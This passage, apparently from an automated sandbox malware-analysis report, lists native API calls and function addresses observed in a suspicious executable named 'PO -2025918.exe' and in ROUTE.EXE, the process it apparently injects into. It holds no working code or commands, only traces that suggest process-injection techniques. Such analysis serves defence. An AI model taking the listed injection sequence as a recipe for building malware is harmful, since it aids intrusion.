                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03302EE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03302D30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03302D10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03302DF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302DD0 NtDelayExecution,LdrInitializeThunk,9_2_03302DD0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03302C70
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302C60 NtCreateKey,LdrInitializeThunk,9_2_03302C60
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03302CA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033035C0 NtCreateMutant,LdrInitializeThunk,9_2_033035C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033039B0 NtGetContextThread,LdrInitializeThunk,9_2_033039B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302B80 NtQueryInformationFile,9_2_03302B80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302AB0 NtWaitForSingleObject,9_2_03302AB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302F60 NtCreateProcessEx,9_2_03302F60
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302FA0 NtQuerySection,9_2_03302FA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302F90 NtProtectVirtualMemory,9_2_03302F90
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302E30 NtWriteVirtualMemory,9_2_03302E30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302EA0 NtAdjustPrivilegesToken,9_2_03302EA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302D00 NtSetInformationFile,9_2_03302D00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302DB0 NtEnumerateKey,9_2_03302DB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302C00 NtQueryInformationProcess,9_2_03302C00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302CF0 NtOpenProcess,9_2_03302CF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302CC0 NtQueryVirtualMemory,9_2_03302CC0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03303010 NtOpenDirectoryObject,9_2_03303010
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03303090 NtSetValueKey,9_2_03303090
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03303D10 NtOpenProcessToken,9_2_03303D10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03303D70 NtOpenThread,9_2_03303D70
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AB91D0 NtCreateFile,9_2_00AB91D0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AB9340 NtReadFile,9_2_00AB9340
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AB94D0 NtClose,9_2_00AB94D0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AB9430 NtDeleteFile,9_2_00AB9430
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AB9640 NtAllocateVirtualMemory,9_2_00AB9640
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0254E0CC0_2_0254E0CC
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_07075D400_2_07075D40
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_070768B00_2_070768B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0707D6A00_2_0707D6A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0707D6C00_2_0707D6C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0707F5C80_2_0707F5C8
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0707F5D80_2_0707F5D8
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0707DF200_2_0707DF20
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0707DF300_2_0707DF30
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_07074B200_2_07074B20
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_07074B300_2_07074B30
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0707FA100_2_0707FA10
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0707DAF80_2_0707DAF8
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0707683F0_2_0707683F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0707689F0_2_0707689F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_070875E80_2_070875E8
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_07089F500_2_07089F50
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_070845900_2_07084590
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_070875E20_2_070875E2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004188C34_2_004188C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004100DA4_2_004100DA
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004100E34_2_004100E3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004012404_2_00401240
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004032304_2_00403230
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00416AD04_2_00416AD0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00416AD34_2_00416AD3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0040E2E34_2_0040E2E3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00401B404_2_00401B40
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004103034_2_00410303
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00401B364_2_00401B36
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0040E4274_2_0040E427
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0040E4334_2_0040E433
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0040264C4_2_0040264C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004026504_2_00402650
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004026694_2_00402669
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0042EFC34_2_0042EFC3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C581CC4_2_01C581CC
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C541A24_2_01C541A2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C601AA4_2_01C601AA
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C281584_2_01C28158
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B901004_2_01B90100
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3A1184_2_01C3A118
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C320004_2_01C32000
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C603E64_2_01C603E6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAE3F04_2_01BAE3F0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5A3524_2_01C5A352
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C202C04_2_01C202C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C402744_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C605914_2_01C60591
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA05354_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4E4F64_2_01C4E4F6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C524464_2_01C52446
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C444204_2_01C44420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9C7C04_2_01B9C7C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA07704_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC47504_2_01BC4750
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBC6E04_2_01BBC6E0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A04_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C6A9A64_2_01C6A9A6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB69624_2_01BB6962
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B868B84_2_01B868B8
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE8F04_2_01BCE8F0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAA8404_2_01BAA840
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA28404_2_01BA2840
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C56BD74_2_01C56BD7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5AB404_2_01C5AB40
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9EA804_2_01B9EA80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB8DBF4_2_01BB8DBF
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9ADE04_2_01B9ADE0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAAD004_2_01BAAD00
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3CD1F4_2_01C3CD1F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B90CF24_2_01B90CF2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40CB54_2_01C40CB5
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0C004_2_01BA0C00
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1EFA04_2_01C1EFA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B92FC84_2_01B92FC8
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C14F404_2_01C14F40
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC0F304_2_01BC0F30
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BE2F284_2_01BE2F28
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5EEDB4_2_01C5EEDB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB2E904_2_01BB2E90
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5CE934_2_01C5CE93
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0E594_2_01BA0E59
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5EE264_2_01C5EE26
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAB1B04_2_01BAB1B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C6B16B4_2_01C6B16B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8F1724_2_01B8F172
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD516C4_2_01BD516C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4F0CC4_2_01C4F0CC
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5F0E04_2_01C5F0E0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C570E94_2_01C570E9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA70C04_2_01BA70C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BE739A4_2_01BE739A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5132D4_2_01C5132D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8D34C4_2_01B8D34C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA52A04_2_01BA52A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C412ED4_2_01C412ED
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBD2F04_2_01BBD2F0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBB2C04_2_01BBB2C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C695C34_2_01C695C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3D5B04_2_01C3D5B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C575714_2_01C57571
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B914604_2_01B91460
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5F43F4_2_01C5F43F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5F7B04_2_01C5F7B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C516CC4_2_01C516CC
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BE56304_2_01BE5630
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C359104_2_01C35910
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA99504_2_01BA9950
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBB9504_2_01BBB950
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA38E04_2_01BA38E0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0D8004_2_01C0D800
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C15BF04_2_01C15BF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBFB804_2_01BBFB80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BDDBF94_2_01BDDBF9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5FB764_2_01C5FB76
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4DAC64_2_01C4DAC6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BE5AA04_2_01BE5AA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C41AA34_2_01C41AA3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3DAAC4_2_01C3DAAC
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C57A464_2_01C57A46
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5FA494_2_01C5FA49
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C13A6C4_2_01C13A6C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBFDC04_2_01BBFDC0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C51D5A4_2_01C51D5A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C57D734_2_01C57D73
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA3D404_2_01BA3D40
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5FCF24_2_01C5FCF2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C19C324_2_01C19C32
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA1F924_2_01BA1F92
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B63FD54_2_01B63FD5
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B63FD24_2_01B63FD2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5FFB14_2_01C5FFB1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5FF094_2_01C5FF09
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA9EB04_2_01BA9EB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338A3529_2_0338A352
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032DE3F09_2_032DE3F0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033903E69_2_033903E6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033702749_2_03370274
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033502C09_2_033502C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032C01009_2_032C0100
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0336A1189_2_0336A118
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033581589_2_03358158
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033901AA9_2_033901AA
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033841A29_2_033841A2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033881CC9_2_033881CC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033620009_2_03362000
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D07709_2_032D0770
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032F47509_2_032F4750
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032CC7C09_2_032CC7C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032EC6E09_2_032EC6E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D05359_2_032D0535
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033905919_2_03390591
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033744209_2_03374420
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033824469_2_03382446
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0337E4F69_2_0337E4F6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338AB409_2_0338AB40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03386BD79_2_03386BD7
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032CEA809_2_032CEA80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032E69629_2_032E6962
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D29A09_2_032D29A0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0339A9A69_2_0339A9A6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D28409_2_032D2840
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032DA8409_2_032DA840
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032B68B89_2_032B68B8
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032FE8F09_2_032FE8F0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03372F309_2_03372F30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03312F289_2_03312F28
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032F0F309_2_032F0F30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03344F409_2_03344F40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0334EFA09_2_0334EFA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032C2FC89_2_032C2FC8
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338EE269_2_0338EE26
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D0E599_2_032D0E59
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338CE939_2_0338CE93
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032E2E909_2_032E2E90
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338EEDB9_2_0338EEDB
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0336CD1F9_2_0336CD1F
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032DAD009_2_032DAD00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032E8DBF9_2_032E8DBF
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032CADE09_2_032CADE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D0C009_2_032D0C00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03370CB59_2_03370CB5
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032C0CF29_2_032C0CF2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338132D9_2_0338132D
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032BD34C9_2_032BD34C
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0331739A9_2_0331739A
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D52A09_2_032D52A0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033712ED9_2_033712ED
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032ED2F09_2_032ED2F0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032EB2C09_2_032EB2C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0339B16B9_2_0339B16B
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032BF1729_2_032BF172
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0330516C9_2_0330516C
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032DB1B09_2_032DB1B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033870E99_2_033870E9
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338F0E09_2_0338F0E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D70C09_2_032D70C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0337F0CC9_2_0337F0CC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338F7B09_2_0338F7B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033156309_2_03315630
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033816CC9_2_033816CC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033875719_2_03387571
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0336D5B09_2_0336D5B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033995C39_2_033995C3
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338F43F9_2_0338F43F
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032C14609_2_032C1460
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338FB769_2_0338FB76
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032EFB809_2_032EFB80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03345BF09_2_03345BF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0330DBF99_2_0330DBF9
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03343A6C9_2_03343A6C
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338FA499_2_0338FA49
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03387A469_2_03387A46
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03315AA09_2_03315AA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03371AA39_2_03371AA3
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0336DAAC9_2_0336DAAC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0337DAC69_2_0337DAC6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_033659109_2_03365910
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D99509_2_032D9950
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032EB9509_2_032EB950
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0333D8009_2_0333D800
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D38E09_2_032D38E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338FF099_2_0338FF09
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338FFB19_2_0338FFB1
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D1F929_2_032D1F92
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03293FD29_2_03293FD2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03293FD59_2_03293FD5
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D9EB09_2_032D9EB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03387D739_2_03387D73
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03381D5A9_2_03381D5A
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032D3D409_2_032D3D40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_032EFDC09_2_032EFDC0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03349C329_2_03349C32
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0338FCF29_2_0338FCF2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AA1D309_2_00AA1D30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00A9CBE79_2_00A9CBE7
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00A9CBF09_2_00A9CBF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00A9ADF09_2_00A9ADF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00A9CE109_2_00A9CE10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00A9AF349_2_00A9AF34
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00A9AF409_2_00A9AF40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AA53D09_2_00AA53D0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AA35E09_2_00AA35E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AA35DD9_2_00AA35DD
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00ABBAD09_2_00ABBAD0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_031AE3339_2_031AE333
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_031AE2169_2_031AE216
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_031AD7989_2_031AD798
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_031AE6D59_2_031AE6D5
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_031ACA289_2_031ACA28
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: String function: 01C1F290 appears 102 times
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: String function: 01C0EA12 appears 86 times
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: String function: 01BD5130 appears 58 times
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: String function: 01B8B970 appears 262 times
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: String function: 01BE7E54 appears 106 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 03305130 appears 58 times
